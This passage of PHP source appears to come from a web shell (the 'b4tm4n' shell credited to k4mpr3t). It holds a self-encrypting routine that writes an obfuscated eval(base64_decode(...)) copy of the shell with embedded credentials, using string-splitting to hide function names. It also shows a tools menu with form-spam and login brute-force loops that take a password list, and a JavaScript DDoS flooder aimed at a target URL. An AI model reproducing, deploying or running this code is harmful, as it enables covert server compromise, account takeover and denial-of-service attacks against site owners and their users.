(\$i=0;\$i<strlen(\$hex);\$i+=2) \r\n\t\t\t\t\$asc.=chr(hexdec(substr(\$hex,\$i,2)));\r\n\t\t\treturn \$asc;\r\n\t\t}\r\n\r\n\t\tfunction hex_bin(\$hex){\r\n\t\t\t\$bin='';\r\n\t\t\tfor(\$i=0;\$i<strlen(\$hex);\$i++)\r\n\t\t\t\t\$bin.=str_pad(decbin(hexdec(\$hex{\$i})),4,'0',STR_PAD_LEFT);\r\n\t\t\treturn \$bin;\r\n\t\t}\r\n\r\n\t\tfunction bin_hex(\$bin){\r\n\t\t\t\$hex='';\r\n\t\t\tfor(\$i=strlen(\$bin)-4;\$i>=0;\$i-=4)\r\n\t\t\t\t\$hex.=dechex(bindec(substr(\$bin,\$i,4)));\r\n\t\t\treturn strrev(\$hex);\r\n\t\t}\r\n\r\n\t\tfunction asc_bin(\$asc){\r\n\t\t\t\$hex=asc_hex(\$asc);\r\n\t\t\treturn hex_bin(\$hex);\r\n\t\t}\r\n\r\n\t\tfunction bin_asc(\$bin){ \r\n\t\t \$hex=bin_hex(\$bin);\r\n\t\t\treturn hex_asc(\$hex);\r\n\t\t}\r\n\t\t\r\n\t\tif(any(\"opt\",\$_REQUEST))\r\n\t\t{\r\n\t\t\tob_clean();\r\n\t\t\t\$opt=\$_REQUEST['opt'];\r\n\t\t\t\$_a=\"b\";\$_b=\"a\";\$_c=\"s\";\$_d=\"e\";\$_e=\"6\";\$_f=\"4\";\r\n\t\t\t\$_g=\"_\";\$_h=\"e\";\$_i=\"n\";\$_j=\"c\";\$_k=\"o\";\$_l=\"d\";\$_m=\"e\";\r\n\t\t\t\$b64e=\$_a.\$_b.\$_c.\$_d.\$_e.\$_f.\$_g.\$_h.\$_i.\$_j.\$_k.\$_l.\$_m;\r\n\t\t\t\$b64d=\$_a.\$_b.\$_c.\$_d.\$_e.\$_f.\$_g.\$_l.\$_m.\$_j.\$_k.\$_l.\$_m;\r\n\t\t\t\$text=\$b64d(\$_POST['text-encode']);\r\n\t\t\tif (\$opt=='basic')\r\n\t\t\t{\r\n\t\t\t\t\$hash=\$_REQUEST['hash'];\r\n\t\t\t\tswitch(\$hash)\r\n\t\t\t\t{\r\n\t\t\t\t\tcase \"md5\":print md5(\$text);break;\r\n\t\t\t\t\tcase \"sha1\":print sha1(\$text);break;\r\n\t\t\t\t\tcase \"chr\":print asc_chr(\$text);break;\r\n\t\t\t\t\tcase \"asc\":print chr_asc(\$text);break;\r\n\t\t\t\t\tcase \"crc32\":print crc32(\$text);break;\r\n\t\t\t\t\tcase \"strlen\":print strlen(\$text);break;\r\n\t\t\t\t\tcase \"strrev\":print strrev(\$text);break;\r\n\t\t\t\t\tcase \"urlencode\":print urlencode(\$text);break;\r\n\t\t\t\t\tcase \"urldecode\":print urldecode(\$text);break;\r\n\t\t\t\t\tcase \"entties\":print htmlentities(\$text);break;\r\n\t\t\t\t\tcase \"spechar\":print htmlspecialchars(\$text);break;\r\n\t\t\t\t\tcase \"base64_encode\":print \$b64e(\$text);break;\r\n\t\t\t\t\tcase \"base64_decode\":print \$b64d(\$text);break;\r\n\t\t\t\t\tcase \"B64E\":print B64E(\$text);break;\r\n\t\t\t\t\tcase \"B64D\":print B64D(\$text);break;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telseif(\$opt=='extra')\r\n\t\t\t{\r\n\t\t\t\t\$hash=\$_REQUEST['hash'];\r\n\t\t\t\tswitch(\$hash)\r\n\t\t\t\t{\r\n\t\t\t\t\tcase \"chr-asc\":print str_asc(\$text);break;\r\n\t\t\t\t\tcase \"asc-chr\":print asc_str(\$text);break;\r\n\t\t\t\t\tcase \"asc-hex\":print asc_hex(\$text);break;\r\n\t\t\t\t\tcase \"hex-asc\":print hex_asc(\$text);break;\r\n\t\t\t\t\tcase \"hex-bin\":print hex_bin(\$text);break;\r\n\t\t\t\t\tcase \"bin-hex\":print bin_hex(\$text);break;\r\n\t\t\t\t\tcase \"asc-bin\":print asc_bin(\$text);break;\r\n\t\t\t\t\tcase \"bin-asc\":print bin_asc(\$text);break;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telseif(\$opt=='crypt')\r\n\t\t\t{\r\n\t\t\t\t\$salt=\$_REQUEST['salt'];\r\n\t\t\t\tprint crypt(\$text,\$salt);\r\n\t\t\t}\r\n\t\t\telseif(\$opt=='hash')\r\n\t\t\t{\r\n\t\t\t\t\$hash=\$_REQUEST['hash'];\r\n\t\t\t\t\$raw=\$_REQUEST['raw'];\r\n\t\t\t\tif(\$raw==true)\r\n\t\t\t\t{\r\n\t\t\t\t\tprint hash(\$hash,\$text,true);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tprint hash(\$hash,\$text);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\texit;\r\n\t\t}\r\n\t}\r\n\tif(\$z==\"form-bruteforces\")\r\n\t{\r\n\t\tprint \"<div class='tools-header'>\r\n\t\t\t <h3>\".\$menu_tools[\$z]['title'].\" v\".\$menu_tools[\$z]['ver'].\"</h3>\r\n\t\t\t <h3> by: \".\$menu_tools[\$z]['auth'].\"</h3>\r\n\t\t </div>\";\r\n\r\n\t\t \$exp=array(\r\n\t\t \t'{',\r\n\t\t \t'\"name\":\"Handsome\",',\r\n\t\t \t'\"email\":\"very@handsome.com\",',\r\n\t\t \t'\"subject\":\"WHOOPS YOU GOT E-MAIL ?!\",',\r\n\t\t \t'\"message\":\"HA HA HA HA HA HA HA HA\",',\r\n\t\t \t'}');\r\n\r\n\t\tprintf(\"<div class='divide'>\r\n\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t\t\t<label>Url Action</label><input type='text' id='form-url' placeholder='http://'/><br>\r\n\t\t\t\t\t\t<label>Count's</label><input type='number' id='form-count' value='100' min='10' autocomplete='off'/><br>\r\n\t\t\t\t\t\t<label>Parameter (JSON)</label>\r\n\t\t\t\t\t\t<textarea id='form-parameter'>%s</textarea>\r\n\t\t\t\t\t\t<input type='submit' onclick=\\\"return ajaxAbort(true,'form-result')\\\" value=Cancel />\r\n\t\t\t\t\t\t<input type='submit' value='Attack' onclick=\\\"return getAjax(true,'form-result','POST','?z=form-bruteforces&url='+document.getElementById('form-url').value+'¶meter='+document.getElementById('form-parameter').value+'&count='+document.getElementById('form-count').value);\\\"/><br>\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t<legend>Result's</legend>\r\n\t\t\t\t\t\t<div id='form-result' class='result'></div>\r\n\t\t\t\t\t</fieldset>\r\n\t\t\t\t</div>\r\n\t\t\t</div>\",implode(\$exp,\"\\n\"));\r\n\r\n\t\tif(any(\"url\",\$_REQUEST)&&any(\"parameter\",\$_REQUEST))\r\n\t\t{\r\n\t\t\tob_clean();\r\n\t\t\t\$start=\$succ=\$fail=0;\r\n\t\t\t\$url=\$_REQUEST['url'];\r\n\t\t\t\$count=\$_REQUEST['count'];\r\n\t\t\t\$parameter=\$_REQUEST['parameter'];\r\n\t\t\t\$content=json_decode(\$parameter,true);\r\n\t\t\tif(!is_array(\$content))\$content=array();\r\n\t\t\tdo {\$start++;\r\n\t\t\t\t\$ch=curl_init();\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_USERAGENT,\$agent);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_URL,\$url);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_POST,1);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_CONNECTTIMEOUT,10);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_POSTFIELDS,http_build_query(\$content));\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_RETURNTRANSFER,1);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_FOLLOWLOCATION,1);\r\n\t\t\t\t\$result=curl_exec(\$ch);\r\n\t\t\t\t\$httpcode=curl_getinfo(\$ch,CURLINFO_HTTP_CODE);\r\n\t\t\t\tif(curl_error(\$ch)) echo curl_error(\$ch);\r\n\t\t\t\tcurl_close(\$ch);\r\n\t\t\t\tif(\$httpcode==200)\r\n\t\t\t\t{\r\n\t\t\t\t\t\$succ++;\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t\$fail++;\r\n\t\t\t\t}\r\n\t\t\t\tif(\$start==\$count)\r\n\t\t\t\t{\r\n\t\t\t\t\techo \"Success: \$succ<br>Failed: \$fail<br>Messages: \".htmlspecialchars(\$result);\r\n\t\t\t\t}\r\n\t\t\t}while(\$start<=\$count);\r\n\t\t\texit;\r\n\t\t}\r\n\t}\r\n\tif(\$z==\"login-bruteforces\")\r\n\t{\r\n\t\tprint \"<div class='tools-header'>\r\n\t\t\t <h3>\".\$menu_tools[\$z]['title'].\" v\".\$menu_tools[\$z]['ver'].\"</h3>\r\n\t\t\t <h3> by: \".\$menu_tools[\$z]['auth'].\"</h3>\r\n\t\t </div>\";\r\n\r\n\t\tprintf(\"<div id='login-bruteforces'>\r\n\t\t\t<div class='divide-left'>\r\n\t\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t\t<label>Url Action</label><input type='text' id='login-url' placeholder='http://'/><br>\r\n\t\t\t\t\t<label>User List</label><input type='text' id='login-user' placeholder='admin' value='admin'/><br>\r\n\t\t\t\t\t<label> </label><input type='text' id='login-username' placeholder='User Fieldname'/><br>\r\n\t\t\t\t\t<label>Pass List</label><input type='text' id='login-passlist' placeholder='http://'/><br>\r\n\t\t\t\t\t<label> </label><input type='text' id='login-passname' placeholder='Pass Fieldname'/><br>\r\n\t\t\t\t\t<input type='submit' onclick=\\\"return getAjax(true,'login-result','POST',\r\n\t\t\t\t\t'?z=login-bruteforces'+\r\n\t\t\t\t\t'&url='+document.getElementById('login-url').value+\r\n\t\t\t\t\t'&user='+document.getElementById('login-user').value+\r\n\t\t\t\t\t'&userfield='+document.getElementById('login-username').value+\r\n\t\t\t\t\t'&passfield='+document.getElementById('login-passname').value+\r\n\t\t\t\t\t'&passlist='+document.getElementById('login-passlist').value);\\\"/><br>\r\n\t\t\t\t</form>\r\n\t\t\t</div>\r\n\t\t\t<div class='divide-right'>\r\n\t\t\t\t<fieldset>\r\n\t\t\t\t\t<legend>Result's</legend>\r\n\t\t\t\t\t<div id='login-result' class='result'></div>\r\n\t\t\t\t</fieldset>\r\n\t\t\t</div>\r\n\t\t</div>\");\r\n\r\n\t\tif(any(\"url\",\$_REQUEST)&&any(\"user\",\$_REQUEST))\r\n\t\t{\r\n\t\t\tob_clean();\r\n\t\t\t\$url=\$_REQUEST['url'];\r\n\t\t\t\$user=\$_REQUEST['user'];\r\n\t\t\t\$file=GetUrlExists(\$_REQUEST['passlist'])? \r\n\t\t\tGetUrlContent(\$_REQUEST['passlist']): \r\n\t\t\t\$_REQUEST['passlist'];\r\n\t\t\t\$words=explode(\"\\n\",\$file);\r\n\t\t\t\$length=count(\$words);\r\n\t\t\tforeach (\$words as \$index => \$word) \r\n\t\t\t{\r\n\t\t\t\t\$parameter=http_build_query(\r\n\t\t\t\t\tarray(\r\n\t\t\t\t\t\t\$_REQUEST['userfield'] => \$user,\r\n\t\t\t\t\t\t\$_REQUEST['passfield'] => \$word,\r\n\t\t\t\t\t\t'Submit' => 'Submit',\r\n\t\t\t\t\t)\r\n\t\t\t\t);\r\n\t\t\t\t\$ch=curl_init();\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_USERAGENT,\$agent);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_URL,\$url);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_POST,1);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_TIMEOUT,5);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_CONNECTTIMEOUT,5);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_POSTFIELDS,\$parameter);\r\n\t\t\t\tcurl_setopt(\$ch,CURLOPT_RETURNTRANSFER,1);\r\n\t\t\t\t\$ra=curl_exec(\$ch);\r\n\t\t\t\t\$st=curl_getinfo(\$ch,CURLINFO_HTTP_CODE);\r\n\t\t\t\tif(curl_error(\$ch)) echo curl_error(\$ch);\r\n\t\t\t\tcurl_close(\$ch);\r\n\t\t\t\tif (\$st==200) \r\n\t\t\t\t{\r\n\t\t\t\t\techo \"FOUND'S: \$user:\$word<br>\";\r\n\t\t\t\t\texit;\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\techo htmlspecialchars(\$ra);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\texit;\r\n\t\t}\r\n\t}\r\n\tif(\$z==\"mass-tools\")\r\n\t{\r\n\t\tprint \"<div class='tools-header'>\r\n\t\t\t <h3>\".\$menu_tools[\$z]['title'].\" v\".\$menu_tools[\$z]['ver'].\"</h3>\r\n\t\t\t <h3> by: \".\$menu_tools[\$z]['auth'].\"</h3>\r\n\t\t </div>\";\r\n\r\n\t\tprint \"Coming Soon\";\r\n\t}\r\n\tif(\$z==\"ddos-attack\")\r\n\t{\r\n\t\tprint \"<div class='tools-header'>\r\n\t\t\t<h3>\".\$menu_tools[\$z]['title'].\" v\".\$menu_tools[\$z]['ver'].\"</h3>\r\n\t\t\t<h3> by: \".\$menu_tools[\$z]['auth'].\"</h3>\r\n\t\t </div>\";\r\n\r\n\t\tprintf('<script type=\"text/javascript\">\r\n\r\n\t\t\t\t\twindow.onload=function(){\r\n\r\n\t\t\t\t\t\tstartTime();\r\n\r\n\t\t\t\t\t\tvar interval;\r\n\t\t\t\t\t\tvar xhttp;\r\n\r\n\t\t\t\t\t\tvar requestsNode=document.getElementById(\"requests\"),\r\n\t\t\t\t\t successNode=document.getElementById(\"success\"),\r\n\t\t\t\t\t proccessNode=document.getElementById(\"proccess\"),\r\n\t\t\t\t\t targetNode=document.getElementById(\"target\"),\r\n\t\t\t\t\t attack=document.getElementById(\"attack\"),\r\n\t\t\t\t\t method=document.getElementById(\"method\"),\r\n\t\t\t\t\t size=document.getElementById(\"size\"),\r\n\t\t\t\t\t time=document.getElementById(\"time\"),\r\n\t\t\t\t\t stamp=document.getElementById(\"stamp\")\r\n\t\t\t\t\t uagent=document.getElementById(\"uagent\")\r\n\t\t\t\t\t referer=document.getElementById(\"referer\")\r\n\t\t\t\t\t origin=document.getElementById(\"origin\")\r\n\r\n\t\t\t\t\t\tvar requests=0,\r\n\t\t\t\t\t succeeded=0,\r\n\t\t\t\t\t proccess=0;\r\n\r\n\t\t\t\t\t\tvar makeHttpRequest=function(){\r\n\t\t\t\t\t\t\tvar data=new FormData();\r\n\t\t\t\t\t\t\tvar buff=new ArrayBuffer(65536);\r\n\t\t\t\t\t\t\tvar xhrx=new XMLHttpRequest();\r\n\t\t\t\t\t\t\tvar agent =[\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0\",\r\n\t\t\t\t\t\t\t\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0\",\r\n\t\t\t\t\t\t\t\"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0\",\r\n\t\t\t\t\t\t\t\"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0\",\r\n\t\t\t\t\t\t\t\"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0\",\r\n\t\t\t\t\t\t\t\"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0\",\r\n\t\t\t\t\t\t\t\"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0\",\r\n\t\t\t\t\t\t\t\"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0\",\r\n\t\t\t\t\t\t\t\"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0\",\r\n\t\t\t\t\t\t\t\"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0\"];\r\n\t\t\t\t\t\t\trandomize=function(arr){\r\n\t\t\t\t\t\t\trand=Math.floor((Math.random()*arr.length));\r\n\t\t\t\t\t\t return arr[rand];}\r\n\t\t\t\t\t\t\txhrx.open(method.value,targetNode.value,true);\r\n\t\t\t\t\t\t\tif (uagent.checked) xhrx.setRequestHeader(\"user-agent\",randomize(agent));\r\n\t\t\t\t\t\t\tif (referer.checked) xhrx.setRequestHeader(\"referer\",targetNode.value);\r\n\t\t\t\t\t\t\tif (origin.checked) xhrx.setRequestHeader(\"origin\",\"*\");\r\n\t\t\t\t\t\t\txhrx.onreadystatechange=function(){\r\n\t\t\t\t\t\t\t if(xhrx.readyState==XMLHttpRequest.DONE){\r\n\t\t\t\t\t\t\t \tif(xhrx.status>=500){\r\n\t\t\t\t\t\t\t\t \tonSuccess();\r\n\t\t\t\t\t\t\t\t }\r\n\t\t\t\t\t\t\t\t onProcess();\r\n\t\t\t\t\t\t\t \t}\r\n\t\t\t\t\t\t\t \tonRequest();\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\txhttp=xhrx;\r\n\t\t\t\t\t\t\tattack=function(){\r\n\t\t\t\t\t\t\tstr=\"\";arr=new Uint32Array(buff);\r\n\t\t\t\t\t\t\twindow.crypto.getRandomValues(arr);\r\n\t\t\t\t\t\t\tfor(var i=0;i<arr.length;i++){\r\n\t\t\t\t\t\t\tstr+=String.fromCharCode(arr[i]);\r\n\t\t\t\t\t\t\t}return str;}\r\n\t\t\t\t\t\t\twhat=attack();\r\n\t\t\t\t\t\t\tfor(var j=0;j<size.value;j++){\r\n\t\t\t\t\t\t\tdata.append(what, stamp.value);}\r\n\t\t\t\t\t\t\txhrx.send(data);\r\n\t\t\t\t\t };\r\n\r\n\t\t\t\t\t\tvar onRequest=function(){\r\n\t\t\t\t\t requests++;\r\n\t\t\t\t\t requestsNode.innerHTML=requests;\r\n\t\t\t\t\t\t };\r\n\r\n\t\t\t\t\t\tvar onProcess=function(){\r\n\t\t\t\t\t\t \tproccess++;\r\n\t\t\t\t\t proccessNode.innerHTML=proccess;\r\n\t\t\t\t\t\t };\r\n\r\n\t\t\t\t\t\tvar onSuccess=function(){\r\n\t\t\t\t\t success++;\r\n\t\t\t\t\t successNode.innerHTML=success;\r\n\t\t\t\t\t \t};\r\n\r\n\t\t\t\t\t\tattack.onclick=function(){\r\n\t\t\t\t\t\t\tvar today=new Date();\r\n\t\t\t\t\t\t var h=today.getHours();\r\n\t\t\t\t\t\t var m=today.getMinutes();\r\n\t\t\t\t\t\t var s=today.getSeconds();\r\n\t\t\t\t\t\t m=m<10?\"0\"+m:m;\r\n\t\t\t\t\t\t s=s<10?\"0\"+s:s;\r\n\t\t\t\t\t\t\tif(this.value==\\'Start\\'){\r\n\t\t\t\t\t\t\t\tthis.value=\"Stop\";\r\n\t\t\t\t\t\t\t\trequests=0;\r\n\t\t\t\t\t\t succeeded=0;\r\n\t\t\t\t\t\t proccess=0;\r\n\t\t\t\t\t\t document.getElementById(\"start\").innerHTML=\"00:00:00\";\r\n\t\t\t\t\t\t document.getElementById(\"finish\").innerHTML=\"00:00:00\";\r\n\t\t\t\t\t\t\t\tinterval=setInterval(makeHttpRequest,(parseInt(time.value)));\r\n\t\t\t\t\t\t\t\tdocument.getElementById(\"start\").innerHTML=h+\":\"+m+\":\"+s;\r\n\t\t\t\t\t\t\t}else if(this.value==\\'Stop\\'){\r\n\t\t\t\t\t\t\t\tthis.value=\"Start\";\r\n\t\t\t\t\t\t\t\txhttp.abort();\r\n\t\t\t\t\t\t\t\tclearInterval(interval);\r\n\t\t\t\t\t\t\t\tdocument.getElementById(\"finish\").innerHTML=h+\":\"+m+\":\"+s;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t};\r\n\r\n\t\t\t\t\t\tfunction startTime(){\r\n\t\t\t\t\t\t var today=new Date();\r\n\t\t\t\t\t\t var h=today.getHours();\r\n\t\t\t\t\t\t var m=today.getMinutes();\r\n\t\t\t\t\t\t var s=today.getSeconds();\r\n\t\t\t\t\t\t m=m<10?\"0\"+m:m;\r\n\t\t\t\t\t\t s=s<10?\"0\"+s:s;\r\n\t\t\t\t\t\t document.getElementById(\"times\").innerHTML=h+\":\"+m+\":\"+s;\r\n\t\t\t\t\t\t var t=setTimeout(startTime,500);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t</script>\r\n\t\t\t\t<form onsubmit=\"return false;\" class=\"new\">\r\n\t\t\t\t\t<label>Target</label><input type=\"text\" id=\"target\" value=\"http://www.target.com\"><br>\r\n\t\t\t\t\t<label>Stamp</label><input type=\"text\" id=\"stamp\" value=\"DDOS ATTACK !!!\"><br>\r\n\t\t\t\t\t<label>Method</label><select id=\"method\">\r\n\t\t\t\t\t<option value=\"PUT\">PUT</option>\r\n\t\t\t\t\t<option value=\"GET\">GET</option>\r\n\t\t\t\t\t<option value=\"POST\">POST</option>\r\n\t\t\t\t\t<option value=\"HEAD\">HEAD</option>\r\n\t\t\t\t\t<option value=\"TRACE\">TRACE</option>\r\n\t\t\t\t\t<option value=\"PATCH\">PATCH</option>\r\n\t\t\t\t\t<option value=\"OPTIONS\">GET</option>\r\n\t\t\t\t\t<option value=\"DELETE\">DELETE</option>\r\n\t\t\t\t\t<option value=\"CONNECT\">CONNECT</option>\r\n\t\t\t\t\t<option value=\"OPTIONS\">OPTIONS</option>\r\n\t\t\t\t\t</select><br>\r\n\t\t\t\t\t<label>Size (kB)</label><input type=\"number\" id=\"size\" value=\"1024\"><br>\r\n\t\t\t\t\t<label>Time (ms)</label><input type=\"number\" id=\"time\" value=\"500\"><br>\r\n\t\t\t\t\t<label>Options</label>\r\n\t\t\t\t\t<input type=\"checkbox\" id=\"uagent\" name=\"uagent\" style=\"vertical-align:middle\"> User Agent\r\n\t\t\t\t\t<input type=\"checkbox\" id=\"referer\" name=\"referer\" style=\"vertical-align:middle\"> Referer Target\r\n\t\t\t\t\t<input type=\"checkbox\" id=\"origin\" name=\"origin\" style=\"vertical-align:middle\"> Origin<br>\r\n\t\t\t\t\t<label style=\"margin:5px 0px 5px\">\r\n\t\t\t\t\t\tTime <span id=\"times\">00:00:00</span> | \r\n\t\t\t\t\t\tStart <span id=\"start\">00:00:00</span> | \r\n\t\t\t\t\t\tFinish <span id=\"finish\">00:00:00</span>\r\n\t\t\t\t\t</label><br>\r\n\t\t\t\t\t<label style=\"margin:0px 0px 5px\">\r\n\t\t\t\t\t\tRequests <span id=\"requests\">0</span> | \r\n\t\t\t\t\t\tProccess <span id=\"proccess\">0</span> | \r\n\t\t\t\t\t\tSuccess <span id=\"success\">0</span>\r\n\t\t\t\t\t</label><br>\r\n\t\t\t\t\t<input type=\"submit\" id=\"attack\" value=\"Start\"/>\r\n\t\t\t\t</form>');\r\n\t}\r\n\r\n\tprint \"</div>\";\r\n}\r\n/* END CUSTOM TOOLZ */\r\n\r\nprintf(\"</div><!-- content -->\r\n\t\t</div><!-- container -->\r\n\t\t\t<div id='footer'>\r\n\t\t\t\t<div id='copyrights'><a href='//github.com/k4mpr3t/b4tm4n'>k4mpr3t</a> © %s</div>\r\n\t\t\t\t<div id='pageload'>Page Loaded in %s Seconds</div>\r\n\t\t\t</div>\r\n\t\t</body>\r\n\t\t</html>\",date('Y'),round((microtime(true)-\$start),2)\r\n);\r\n\r\n}?>\r\n")) {
$asu = strpos($php_script, $_SESSION["action"]["password"]);
$temp = substr($php_script, $asu + 48);
$rand = "\$" . substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, rand(1, 3));
$rand2 = "\$" . substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, rand(2, 5));
$_a = "b";
$_b = "a";
$_c = "s";
$_d = "e";
$_e = "6";
$_f = "4";
$_g = "_";
$_h = "e";
$_i = "n";
$_j = "c";
$_k = "o";
$_l = "d";
$_m = "e";
$b64e = "base64_encode";
$b64d = "base64_decode";
$b64 = array('"\\142\\141\\163\\x65\\66\\x34\\137\\x64\\x65\\x63\\157\\144\\145"', 'strrev("ed"."oce"."d_4"."6es"."ab")', 'strrev("e"."doc"."ed_"."46e"."sab")', '"b"."as"."e6"."4_"."d"."ec"."o"."de"', '"ba"."se"."6"."4_d"."e"."cod"."e"');
$rand_b64 = array_rand($b64);
$rand3 = $b64[$rand_b64];
$var1 = $rand . '="' . $_SESSION["action"]["username"] . ':' . $_SESSION["action"]["password"] . '";';
$var2 = $rand2 . '=' . $rand3 . ';';
$var = array($var1 . $var2, $var2 . $var1);
$rand_var = array_rand($var);
$rand4 = $var[$rand_var];
$self = preg_replace("/\\\$x_/", $rand, $temp);
// Change Variable $x_ to Random
$src_ = '';
$src_ = "<?php ";
$src_ .= $rand4;
$src_ .= '@eval(' . $rand2 . '("';
$src_ .= base64_encode(htmlspecialchars_decode($self));
$src_ .= '"))';
$src_ .= '?>';
$name = !empty($_REQUEST['name']) ? $_REQUEST['name'] : 'bat_encrypt.php';
$file = "/var/www/htmlDIRECTORY_SEPARATOR" . $name;
$op = fopen($file, 'w+');
fwrite($op, $src_);
fclose($op);
printf("<center class='on'>SELF ENCRYPT CREATED !!!</center>\r\n\t\t\t\t\t<center class='on'>\r\n\t\t\t\t\t\tLink -> <a href='%s' target='_blank'><u>%s</u></a>\r\n\t\t\t\t\t</center>", GetUrlFromPath($file), $name);
} else {
print "<center class='off'>SELF ENCRYPT ENABLE !!!</center>";
}
}
}
/* START CUSTOM TOOLZ */
if (any("z", $_REQUEST)) {
$z = $_REQUEST['z'];
print MenuTools(array("target-map" => array("title" => "Target Map", "ver" => "2.0", "auth" => "k4mpr3t"), "port-scanner" => array("title" => "Scan Port", "ver" => "1.0", "auth" => "k4mpr3t"), "script-loader" => array("title" => "Script Loader", "ver" => "1.0", "auth" => "k4mpr3t"), "encryptor" => array("title" => "Encryptor", "ver" => "1.1", "auth" => "k4mpr3t"), "form-bruteforces" => array("title" => "Form Bruteforces", "ver" => "1.0", "auth" => "k4mpr3t"), "login-bruteforces" => array("title" => "Login Bruteforces", "ver" => "1.0", "auth" => "k4mpr3t"), "mass-tools" => array("title" => "Mass Tools", "ver" => "1.0", "auth" => "k4mpr3t"), "ddos-attack" => array("title" => "DDOS Attack", "ver" => "2.0", "auth" => "k4mpr3t")));
print "<div id='tools'>";
if (empty($z)) {
printf("<div id='thanks'>\r\n\t\t\t\t\t<h2>Nothing Is Secure...</h2>\r\n\t\t\t\t\t<h3>WHY SO serious ?!</h3>\r\n\t\t\t\t</div>");
}
if ($z == "target-map") {
print "<div class='tools-header'>\r\n\t\t\t\t <h3>" . $menu_tools[$z]['title'] . " v" . $menu_tools[$z]['ver'] . "</h3>\r\n\t\t\t\t <h3> by: " . $menu_tools[$z]['auth'] . "</h3>\r\n\t\t\t </div>";
printf("<div id='target-map'>\r\n\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t<input type='text' id='map-ip' value='%s'/>\r\n\t\t\t\t<input type='submit' value='Trace' onclick=\"return getAjax(true,'target-info','POST','?z=target-map&ip='+document.getElementById('map-ip').value);\"/><br>\r\n\t\t\t</form>\r\n\t\t</div>\r\n\t\t<div id='target-info' class='result'></div>", gethostbyname(http_host));
if (any("ip", $_REQUEST)) {
ob_clean();
$ip = !empty($_REQUEST['ip']) ? $_REQUEST['ip'] : gethostbyname(http_host);
$valid = filter_var($ip, FILTER_VALIDATE_IP) or die('Invalid IP Address');
if ($_REQUEST['ip'] == gethostbyname(http_host)) {
$url = B64D("zSI9xWleO7odODUdzH4qy79ezmMeyr1=");
$geoip = GetUrlContent($url);
$json = json_decode($geoip, true);
} else {
$url = sprintf(B64D("zSI9xWleO7odODUdzH4qy79ezmMeyr1=") . "%s", $ip);
$geoip = GetUrlContent($url);
$json = json_decode($geoip, true);
}
$url = sprintf(B64D("zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa") . "?q=%s,%s&z=10&output=embed", $json['lat'], $json['lon']);
printf("<div class='divide'>\r\n\t\t\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t\t\t<table class='table'>\r\n\t\t\t\t\t\t\t\t<tr><td>AS</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>City</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Country</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Country Code</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>ISP</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Latitude</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Logitude</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t\t\t<table class='table'>\r\n\t\t\t\t\t\t\t\t<tr><td>Origin</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>IP</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Region</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Region 